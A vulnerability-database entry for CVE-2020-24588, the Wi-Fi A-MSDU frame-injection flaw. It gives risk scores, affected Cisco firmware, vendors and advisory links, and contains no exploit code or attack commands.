CVE-2020-24588

moderate-risk
Published 2021-05-11

The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SSP A-MSDU frames (which is mandatory as part of 802.11n), an adversary can abuse this to inject arbitrary network packets.

Do I need to act?

-
0.31% chance of exploitation
EPSS score — low exploit probability
-
Not on CISA KEV list
No confirmed active exploitation reported to CISA
?
Patch status unknown
Check vendor advisories for fix availability and mitigation guidance
3
CVSS 3.5/10 Low
ADJACENT_NETWORK / LOW complexity

Affected Products (20)

Meraki Z3C Firmware
Webex Board 55 Firmware
Webex Board 55S Firmware
Webex Board 70 Firmware
Webex Board 70S Firmware
Webex Board 85S Firmware
Webex Dx70 Firmware
Webex Dx80 Firmware
Webex Room 55 Firmware
Webex Room 55 Dual Firmware
Webex Room 70 Firmware
Webex Room 70 Dual Firmware
Webex Room 70 Dual G2 Firmware
Webex Room 70 Single Firmware
Webex Room 70 Single G2 Firmware
Webex Room Kit Firmware
Webex Room Kit Mini Firmware

Affected Vendors

Cisco Debian Microsoft Linux Siemens Intel Ieee Arista

References (20)

Mailing List http://www.openwall.com/lists/oss-security/2021/05/11/12
Third Party Advisory https://cert-portal.siemens.com/productcert/pdf/ssa-913875.pdf
Third Party Advisory https://github.com/vanhoefm/fragattacks/blob/master/SUMMARY.md
Mailing List https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html
Mailing List https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html
https://lists.debian.org/debian-lts-announce/2023/04/msg00002.html
Third Party Advisory https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-w...
Third Party Advisory https://www.arista.com/en/support/advisories-notices/security-advisories/12602-s...
Exploit https://www.fragattacks.com
Third Party Advisory https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00473....
Mailing List http://www.openwall.com/lists/oss-security/2021/05/11/12
Third Party Advisory https://cert-portal.siemens.com/productcert/pdf/ssa-913875.pdf
Third Party Advisory https://github.com/vanhoefm/fragattacks/blob/master/SUMMARY.md
Mailing List https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html
Mailing List https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html
https://lists.debian.org/debian-lts-announce/2023/04/msg00002.html
Third Party Advisory https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-w...
Third Party Advisory https://www.arista.com/en/support/advisories-notices/security-advisories/12602-s...
Exploit https://www.fragattacks.com
Third Party Advisory https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00473....
47
/ 100
moderate-risk
Severity 13/34 · Low
Exploitability 1/34 · Minimal
Exposure 33/34 · Critical